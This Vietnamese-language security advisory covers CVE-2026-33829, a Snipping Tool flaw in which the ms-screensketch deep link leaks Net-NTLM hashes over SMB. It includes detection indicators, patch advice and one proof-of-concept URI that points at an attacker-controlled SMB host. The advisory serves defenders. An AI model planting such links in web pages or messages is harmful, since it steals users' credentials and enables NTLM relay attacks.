CVE-2026-33829 là một lỗ hổng CVE trong Microsoft Snipping Tool cho phép kẻ tấn công âm thầm đánh cắp Net-NTLM credential hashes bằng cách dẫn nạn nhân truy cập một trang web độc hại. Đây là một lỗ hổng zero-day đã có PoC exploit công khai, làm tăng rủi ro bảo mật cho các hệ thống Windows bị ảnh hưởng.
Lỗ hổng CVE-2026-33829 trong Microsoft Snipping Tool
Lỗ hổng nằm ở cách Windows Snipping Tool xử lý deep link URI registrations thông qua schema ms-screensketch. Phiên bản bị ảnh hưởng đăng ký deep link này và chấp nhận tham số filePath.
Theo mô tả kỹ thuật, do thiếu kiểm tra đầu vào phù hợp, kẻ tấn công có thể truyền một UNC path trỏ đến máy chủ SMB từ xa do mình kiểm soát. Khi người dùng xác thực với tài nguyên đó, hệ thống sẽ tự động phát sinh kết nối SMB và làm lộ Net-NTLM hash.
Thông tin tham chiếu công khai có thể xem tại NVD.
Cách khai thác lỗ hổng CVE
Để khai thác, kẻ tấn công chỉ cần lưu trữ một malicious URL hoặc một trang HTML tự kích hoạt deep link, sau đó dụ mục tiêu truy cập. PoC do Black Arrow Security công bố minh họa cách kích hoạt bằng một URI do trình duyệt mở.
ms-screensketch:?filePath=\\attacker-controlled-server\share\image.pngKhi nạn nhân mở liên kết này, Snipping Tool khởi chạy và cố tải tài nguyên từ xa qua SMB. Trong quá trình đó, Windows gửi phản hồi xác thực Net-NTLM tới máy chủ của kẻ tấn công, khiến hash có thể bị bẻ khóa offline hoặc bị dùng trong NTLM relay attacks vào tài nguyên nội bộ.
Ảnh hưởng của cuộc tấn công mạng
CVE-2026-33829 đặc biệt nguy hiểm vì có thể được nhúng vào các chiến dịch tấn công mạng dựa trên kỹ thuật lừa đảo. Snipping Tool vẫn mở bình thường trong quá trình khai thác, khiến hành vi trông giống thao tác hợp lệ với người dùng cuối.
Kịch bản lừa đảo có thể xoay quanh việc yêu cầu cắt ảnh nền công ty, chỉnh sửa ảnh thẻ, hoặc xem tài liệu nội bộ. Trong môi trường doanh nghiệp, điều này làm tăng hiệu quả của tin tức bảo mật liên quan đến phishing và lạm dụng xác thực NTLM.
Phần remote code execution không phải là mục tiêu của lỗ hổng này; thay vào đó, trọng tâm là rò rỉ xác thực và khả năng bị xâm nhập trái phép thông qua NTLM relay.
IOC và dấu hiệu phát hiện xâm nhập
Nội dung công bố không đề cập đến IOC theo kiểu malware hoặc ransomware, nhưng có các chỉ dấu kỹ thuật cần theo dõi để phát hiện xâm nhập:
- Outbound SMB traffic bất thường trên port 445 tới host bên ngoài hoặc không xác định.
- URL hoặc trang HTML có khả năng tự kích hoạt ms-screensketch deep link.
- Yêu cầu truy cập tới UNC path trỏ về máy chủ SMB do bên ngoài kiểm soát.
- Sự kiện xác thực NTLM phát sinh từ máy trạm khi người dùng chỉ truy cập nội dung web.
Khuyến nghị giám sát mạng
Đội ngũ an ninh mạng nên kiểm tra lưu lượng SMB đi ra ngoài mạng nội bộ, đặc biệt từ các máy trạm có cài Snipping Tool. Việc chặn outbound SMB tại biên mạng là biện pháp phòng vệ hữu hiệu, ngay cả trước khi toàn bộ hệ thống được vá.
Với các môi trường có kiểm soát nghiêm ngặt, có thể dùng danh sách chặn ở firewall hoặc proxy để giảm nguy cơ bảo mật từ các kết nối SMB không mong muốn.
Biện pháp vá lỗi và cập nhật bản vá
Microsoft đã khắc phục lỗ hổng CVE này trong bản cập nhật bảo mật ngày 14/04/2026. Hệ thống và người dùng đang chạy phiên bản Snipping Tool bị ảnh hưởng cần cài đặt ngay update vá lỗi này để giảm rủi ro bị khai thác.
Trước mắt, các nhóm vận hành nên ưu tiên:
- Áp dụng bản vá bảo mật tháng 04/2026 cho Windows.
- Kiểm tra các máy trạm có khả năng thực thi deep link ms-screensketch.
- Giám sát yêu cầu SMB bất thường tới host ngoài miền tin cậy.
- Rà soát các chính sách hạn chế NTLM authentication trong môi trường doanh nghiệp.
PoC exploit và mức độ khai thác
PoC exploit do Black Arrow Security công bố cho thấy việc khai thác CVE-2026-33829 không đòi hỏi kỹ thuật phức tạp. Một URL độc hại hoặc trang HTML có thể đủ để kích hoạt chuỗi khai thác, khiến đây trở thành một zero-day vulnerability đáng chú ý trong nhóm cảnh báo CVE.
Liên kết mã nguồn PoC: GitHub PoC for CVE-2026-33829.
Trong bối cảnh lỗ hổng CVE này, điều quan trọng nhất là ngăn chặn việc lộ Net-NTLM hash, vì hash này có thể bị tái sử dụng trong các kỹ thuật tấn công tiếp theo nếu không được phát hiện và xử lý kịp thời.
